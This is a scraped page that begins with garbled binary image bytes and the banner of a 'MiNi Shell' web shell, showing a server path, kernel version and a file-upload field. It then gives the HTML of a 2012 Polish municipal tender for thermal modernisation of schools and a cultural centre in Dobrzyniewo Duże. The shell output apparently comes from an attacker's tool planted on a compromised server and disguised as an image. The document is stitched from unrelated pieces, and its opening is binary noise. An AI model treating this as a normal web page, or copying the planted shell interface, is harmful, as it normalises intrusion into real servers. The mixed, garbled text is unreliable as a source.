JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120802/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120802/281874-N-2012.html

<p class="kh_header"><b>Dobrzyniewo Duże: pn. Termomodernizacja obiektów użyteczności publicznej na terenie Gminy Dobrzyniewo Duże- etap I</b><br>
<b>Numer ogłoszenia: 281874 - 2012; data zamieszczenia: 02.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dobrzyniewo Duże , ul. Białostocka 25, 16-002 Dobrzyniewo Duże, woj. podlaskie, tel. 85 7428155, faks 85 7197147.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dobrzyniewo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> pn. Termomodernizacja obiektów użyteczności publicznej na terenie Gminy Dobrzyniewo Duże- etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie termomodernizacji trzech budynków w ramach zadania pn.Termomodernizacja obiektów użyteczności publicznej na terenie Gminy Dobrzyniewo Duże. Zakres prac obejmuje: docieplenie (min. wymiana stolarki drzwiowej i okiennej, wymiana pokrycia dachowego, ocieplenie stropodachów, stropów, ścian zewnętrznych piwnic oraz nadziemia budynku styropianem), modernizacja instalacji c.o.. Gmina Dobrzyniewo Duże planuje realizację następujących obiektów użyteczności publicznej w roku 2012 t. j.
CZĘŚĆ I - Termomodernizacja  Szkoły Podstawowej w Obrubnikach, Obrubniki 33, 16-002 Dobrzyniewo Duże, 
CZĘŚĆ II - Termomodernizacja  Zespołu Szkolno-Przedszkolnego w Nowym Aleksandrowie, ul. Pogodna 107, 16-002 Dobrzyniewo Duże,
CZĘŚĆ III - Termomodernizacja Wiejskiego Domu Kultury w Nowym Aleksandrowie, ul. Pogodna 109, 16-002 Dobrzyniewo Duże.
1.Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może złożyć oferty częściowe na jedną lub więcej części zamówienia.
2.Szczegółowy Opis Przedmiotu Zamówienia zawarty jest w:
a)projektach budowlanym (stanowiących Załączniki Nr: CZĘŚĆ I - 7A, CZĘŚĆ II  - 8A, CZĘŚĆ III - 9A do SIWZ) 
b)audytach energetycznych - dokument nadrzędny względem pozostałych-w szczególności w zakresie parametrów zastosowanych materiałów, (stanowiących Załączniki Nr: CZĘŚĆ I - 7B, CZĘŚĆ II  - 8B, CZĘŚĆ III - 9B do SIWZ) oraz 
c)Specyfikacjach technicznych wykonania i odbioru robót (STWiOR) (stanowiących Załączniki Nr: CZĘŚĆ I - 7C, CZĘŚĆ II  - 8C, CZĘŚĆ III - 9C do SIWZ).
d)Przedmiarach robót (stanowiących Załączniki nr CZĘŚĆ I - 7D i 7E, CZĘŚĆ II - nr 8D I 8E, CZĘŚĆ III - nr 9D I 9E do SIWZ).
3.Pozostałe warunki dotyczące wykonania zamówienia zostały określone w Istotnych Postanowieniach Umowy - Załącznik Nr 10 do SIWZ.
Wykonawca udzieli gwarancji na roboty budowlane objęte przedmiotem zamówienia na okres 36 miesięcy licząc od daty podpisania protokołu odbioru końcowego inwestycji.
Zamawiający dysponuje przedmiarami robót, które załącza do SIWZ jako materiał poglądowy. Przedmiary dla Wykonawcy nie mogą stanowić podstawy do wyceny ryczałtowej robót. Cenę ryczałtową należy określić na podstawie dokumentacji projektowej, SIWZ, STWiOR, Audytu energetycznego i ewentualnej wizji w terenie.
4.Wybrany oferent przed podpisaniem umowy przedstawi kosztorys ofertowy, spełniający wymagania określone w Rozdz. XII SIWZ oraz harmonogram rzeczowo-finansowy.
5.Zaleca się aby każdy Wykonawca na własny koszt dokonał oględzin budynku celem sprawdzenia i zapoznania się z przyszłym terenem budowy oraz warunkami związanymi z wykonywaniem robót budowlanych objętych przedmiotem zamówienia oraz uzyskania informacji koniecznych do oceny i wyceny wszystkich robót i czynności niezbędnych do realizacji niniejszego zamówienia
6.Wykonawca ma obowiązek realizacji prac z zakresu termomodernizacji w/w obiektów budowlanych zgodnie z ustawą z dnia 16 kwietnia 2004r. o ochronie przyrody (Dz. U. Nr 92, poz. 880 z późn. zm.).
7.Przewiduje się wykonanie przeglądu termowizyjnego wykonanych robót budowlanych przez wskazaną przez Zamawiającego uprawnioną jednostkę na koszt Wykonawcy.  
8.Wykonawca dostarczy na własny koszt dla Zamawiającego Świadectwo charakterystyki energetycznej po zakończeniu robót w ramach odbioru końcowego oraz inwentaryzacje powykonawczą.
9.Projekty nie zawierają znaków towarowych. Wymieniona w pkt III i VI firma służy dokładnemu określeniu kolorów, co zostało jasno zapisane w projekcie. Oznacza to jedynie  przyjęty wzorzec jako odnośnik do określenia koloru jaki zaprojektował Projektant w porozumieniu z Inwestorem i jakiego koloru spodziewa się inwestor na obiekcie po wykonaniu termomodernizacji (druk kolorowy w projekcie ze względu na właściwości drukarek może różnić się od jednoznacznie opisanego w taki sposób koloru).
10.Zaznaczyć natomiast należy, iż zapis w projekcie o dowolnym systemie i tynku o podobnych właściwościach oznacza brak możliwości łączenia elementów różnych systemów dociepleń w całość oraz spełnianie przez przyjęty system parametrów i właściwości tynku, które zostały opisane w projekcie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.33.11.00-7, 45.42.11.30-4, 45.26.12.00-6, 45.32.10.00-3, 45.44.30.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda od Wykonawców wniesienia wadium w wysokości:
1.1.Część I - 10.000 złotych brutto
1.2.Część II - 5.000 złotych brutto
1.3.Część III - 5.000 złotych brutto
Szczegółowe infromacje zawarte są w rozdziale VIII SIWZ</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże posiadanie wiedzy i doświadczenia wyrażające się w wykonaniu zgodnie z zasadami sztuki budowlanej i prawidłowym ukończeniu, w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 2 robót budowlanych, których przedmiotem było wykonanie termomodernizacji obiektów użyteczności publicznej obejmującej swoim zakresem:
I część zamówienia - docieplenie ścian, wymianę stolarki budowlanej oraz wymianę instalacji centralnego ogrzewania o wartości nie mniejszej niż 200 000 zł brutto każda.
II część zamówienia - docieplenie ścian i wymianę stolarki budowlanej o wartości nie mniejszej niż 150 000 zł brutto każda.
III część zamówienia - docieplenie ścian i wymianę stolarki budowlanej o wartości nie mniejszej niż 50 000 zł brutto każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował  następującymi osobami odpowiedzialnymi za kierowanie robotami budowlanymi, które będą uczestniczyć w wykonywaniu zamówienia,:
Kierownik budowy - posiadający uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń, który posiada co najmniej 2 lata doświadczenia na stanowisku kierownika budowy;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną co najmniej 100.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Wypełniony Formularz Ofertowy [sporządzony według wzoru stanowiącego Załącznik nr 1 do SIWZ]; 
b) W przypadku zamiaru powierzania wykonania zamówienia podwykonawcom - informację na temat części zamówienia, której wykonanie Wykonawca powierzy podwykonawcom (w Formularzu Ofertowym);
c) Dokumenty i oświadczenia potwierdzające spełnianie warunków udziału w postępowaniu [wymienione w Rozdz. VI SIWZ];
d) stosowne Pełnomocnictwo(a) - w przypadku, gdy:
i. upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru
ii. Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, (dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia następujących zmian postanowień zawartej umowy:
1)w zakresie wynagrodzenia - gdy nastąpi zmiana stawki podatku od towarów i usług (VAT) w związku ze zmianą przepisów o podatku od towarów i usług - o kwotę będącą różnicą pomiędzy kwotą VAT po zmianie stawki tego podatku;
2)w zakresie terminu wykonania zamówienia, w przypadku:
a)braku dostępu do pomieszczeń lub obszarów, w których wykonywane są roboty objęte zamówieniem (przesunięcie terminu może nastąpić wyłącznie o czas równy ilości dni braku dostępu do pomieszczeń lub obszarów, w których wykonywane są roboty);
b)braku dostępu do mediów (np. awarie w dostawach energii elektrycznej, wody czy innych mediów niezbędnych do wykonania przedmiotu umowy) - przesunięcie terminu może nastąpić wyłącznie o czas równy ilości dni trwania awarii powodującej brak dostępu do mediów;
c)opóźnienia ze strony Zamawiającego przekazania Wykonawcy terenu budowy - przesunięcie terminu może nastąpić wyłącznie o czas równy ilości dni zwłoki, w jakiej pozostaje Zamawiający [od dnia powstania zwłoki do dnia protokolarnego przekazania terenu budowy];
d)z powodu istotnych braków lub błędów w dokumentacji projektowej, również tych polegających na niezgodności dokumentacji z przepisami prawa -wyłącznie o czas dokonywania zmian w projekcie, jeżeli nie jest w czasie wprowadzania zmian możliwe wykonywanie przedmiotu zamówienia,
e)z powodu wystąpienia zamówień lub robót dodatkowych, jeżeli nie jest możliwe wykonywanie zamówienia podstawowego równolegle do wykonywania zamówienia (robót) dodatkowych - wyłącznie o okres wykonywania zamówienia (robót) dodatkowego,
f)z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach, na czas jej działania uniemożliwiającego wykonywanie zamówienia,
g)z powodu działań osób trzecich uniemożliwiających wykonanie zamówienia, które to działania nie są konsekwencją winy którejkolwiek ze stron - wyłącznie na okres uniemożliwienia Wykonawcy wykonywania zamówienia.
O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien jest poinformować Zamawiającego pisemnie i natychmiast odnotować to w dzienniku budowy.
Strony z powodów, jakie mogą wpływać na zmiany terminów wykonania robót, wyłączają niedogodności związane z pogodą, typową dla okresu wykonywania robót w miejscu budowy.
Strony dopuszczają możliwość zmian redakcyjnych, omyłek pisarskich oraz zmian będących następstwem zmian danych ujawnionych w rejestrach publicznych bez konieczności sporządzania aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.ug.dobrzyniewoduze.wrotapodlasia.pl/przetargi/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Dobrzyniewie Dużym, ul. Białostocka 25, 16-002 Dobrzyniewo Duże pok. Nr 12,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.08.2012 godzina 10:00, miejsce: Urząd Gminy Dobrzyniewo Duże, ul. Białostocka 25, 16-002 Dobrzyniewo Duże pok. 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Programu Operacyjnego Infrastruktura i Środowisko, Priorytet: IX Infrastruktura energetyczna przyjazna środowisku i efektywność energetyczna, Działanie: 9.3 Termomodernizacja obiektów użyteczności publicznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Termomodernizacja Szkoły Podstawowej w Obrubnikach, Obrubniki 33, 16-002 Dobrzyniewo Duże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie termomodernizacja budynku w ramach zadania pn.Termomodernizacja obiektów użyteczności publicznej na terenie Gminy Dobrzyniewo Duże. Zakres prac obejmuje: docieplenie (min. wymiana stolarki drzwiowej i okiennej, wymiana pokrycia dachowego, ocieplenie stropodachów, stropów, ścian zewnętrznych piwnic oraz nadziemia budynku styropianem), modernizacja instalacji c.o.. 
Gmina Dobrzyniewo Duże planuje w roku 2012 . Termomodernizację  Szkoły Podstawowej w Obrubnikach, Obrubniki 33, 16-002 Dobrzyniewo Duże, 
Szczegółowy Opis Przedmiotu Zamówienia zawarty jest w:
a)projektach budowlanym (stanowiących Załączniki Nr 7A do SIWZ,
b)audytach energetycznych - dokument nadrzędny względem pozostałych-w szczególności w zakresie parametrów zastosowanych materiałów, stanowiących Załączniki Nr 7B do SIWZ, oraz 
c)Specyfikacjach technicznych wykonania i odbioru robót (STWiOR) stanowiących Załączniki Nr 7C do SIWZ,
d)Przedmiarach robót stanowiących Załączniki nr 7D i 7E do SIWZ,
Pozostałe warunki dotyczące wykonania zamówienia zostały określone w Istotnych Postanowieniach Umowy - Załącznik Nr 10 do SIWZ.
Wykonawca udzieli gwarancji na roboty budowlane objęte przedmiotem zamówienia na okres 36 miesięcy licząc od daty podpisania protokołu odbioru końcowego inwestycji.
Zamawiający dysponuje przedmiarami robót, które załącza do SIWZ jako materiał poglądowy. Przedmiary dla Wykonawcy nie mogą stanowić podstawy do wyceny ryczałtowej robót. Cenę ryczałtową należy określić na podstawie dokumentacji projektowej, SIWZ, STWiOR, Audytu energetycznego i ewentualnej wizji w terenie.
Wybrany oferent przed podpisaniem umowy przedstawi kosztorys ofertowy, spełniający wymagania określone w Rozdz. XII SIWZ oraz harmonogram rzeczowo-finansowy.Zaleca się aby każdy Wykonawca na własny koszt dokonał oględzin budynku celem sprawdzenia i zapoznania się z przyszłym terenem budowy oraz warunkami związanymi z wykonywaniem robót budowlanych objętych przedmiotem zamówienia oraz uzyskania informacji koniecznych do oceny i wyceny wszystkich robót i czynności niezbędnych do realizacji niniejszego zamówienia
Wykonawca ma obowiązek realizacji prac z zakresu termomodernizacji w/w obiektu budowlanego zgodnie z ustawą z dnia 16 kwietnia 2004r. o ochronie przyrody (Dz. U. Nr 92, poz. 880 z późn. zm.).
Przewiduje się wykonanie przeglądu termowizyjnego wykonanych robót budowlanych przez wskazaną przez Zamawiającego uprawnioną jednostkę na koszt Wykonawcy.  
8.Wykonawca dostarczy na własny koszt dla Zamawiającego Świadectwo charakterystyki energetycznej po zakończeniu robót w ramach odbioru końcowego oraz inwentaryzacje powykonawczą.
9.Projekty nie zawierają znaków towarowych. Wymieniona w pkt III i VI firma służy dokładnemu określeniu kolorów, co zostało jasno zapisane w projekcie. Oznacza to jedynie  przyjęty wzorzec jako odnośnik do określenia koloru jaki zaprojektował Projektant w porozumieniu z Inwestorem i jakiego koloru spodziewa się inwestor na obiekcie po wykonaniu termomodernizacji (druk kolorowy w projekcie ze względu na właściwości drukarek może różnić się od jednoznacznie opisanego w taki sposób koloru). Zaznaczyć natomiast należy, iż zapis w projekcie o dowolnym systemie i tynku o podobnych właściwościach oznacza brak możliwości łączenia elementów różnych systemów dociepleń w całość oraz spełnianie przez przyjęty system parametrów i właściwości tynku, które zostały opisane w projekcie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.33.11.00-7, 45.42.11.30-4, 45.26.12.00-6, 45.32.10.00-3, 45.44.30.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
